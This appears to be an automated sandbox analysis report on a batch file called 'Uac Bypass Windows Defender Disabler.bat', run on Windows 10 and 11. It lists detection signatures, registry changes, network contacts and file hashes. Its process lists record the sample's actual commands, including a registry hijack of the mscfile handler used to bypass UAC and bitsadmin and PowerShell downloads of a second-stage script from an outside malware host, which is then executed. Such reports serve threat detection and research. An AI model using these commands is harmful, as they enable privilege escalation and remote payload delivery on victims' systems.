Analysis Overview
SHA256
acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e
Threat Level: Likely malicious
The file Uac Bypass Windows Defender Disabler.bat was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry key
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-29 21:08
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-29 21:08
Reported
2024-07-29 21:11
Platform
win11-20240709-en
Max time kernel
148s
Max time network
156s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3666881604-935092360-1617577973-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
memory/3484-0-0x00007FFBB88D3000-0x00007FFBB88D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snw0qist.kax.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3484-9-0x0000026FF2020000-0x0000026FF2042000-memory.dmp
memory/3484-10-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp
memory/3484-11-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp
memory/3484-12-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp
memory/3484-16-0x00007FFBB88D0000-0x00007FFBB9392000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
| MD5 | fd4da2cc07c7d383dc94559b5a2b7dea |
| SHA1 | d2acf7fb38e61fd0eb426ce74656facc64ca82b3 |
| SHA256 | cc53793f4614d359876cdf2f8e5a76492edd83cafbde8b6658d225e4ae5cde05 |
| SHA512 | c46fef3b8ecb810f7c7366f27ae8c3fe72675fc55f3605bc311b24e2df465e5c43d8512c23cfa965f06a41ee235e42de6dba1628539aa0cb67b729de84d4d239 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-29 21:08
Reported
2024-07-29 21:10
Platform
win10-20240404-en
Max time kernel
79s
Max time network
83s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/2536-2-0x00007FFB06773000-0x00007FFB06774000-memory.dmp
memory/2536-5-0x0000026C49140000-0x0000026C49162000-memory.dmp
memory/2536-8-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp
memory/2536-10-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp
memory/2536-9-0x0000026C492F0000-0x0000026C49366000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2t4ng0fr.yay.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2536-25-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp
memory/2536-31-0x00007FFB06770000-0x00007FFB0715C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
| MD5 | fd4da2cc07c7d383dc94559b5a2b7dea |
| SHA1 | d2acf7fb38e61fd0eb426ce74656facc64ca82b3 |
| SHA256 | cc53793f4614d359876cdf2f8e5a76492edd83cafbde8b6658d225e4ae5cde05 |
| SHA512 | c46fef3b8ecb810f7c7366f27ae8c3fe72675fc55f3605bc311b24e2df465e5c43d8512c23cfa965f06a41ee235e42de6dba1628539aa0cb67b729de84d4d239 |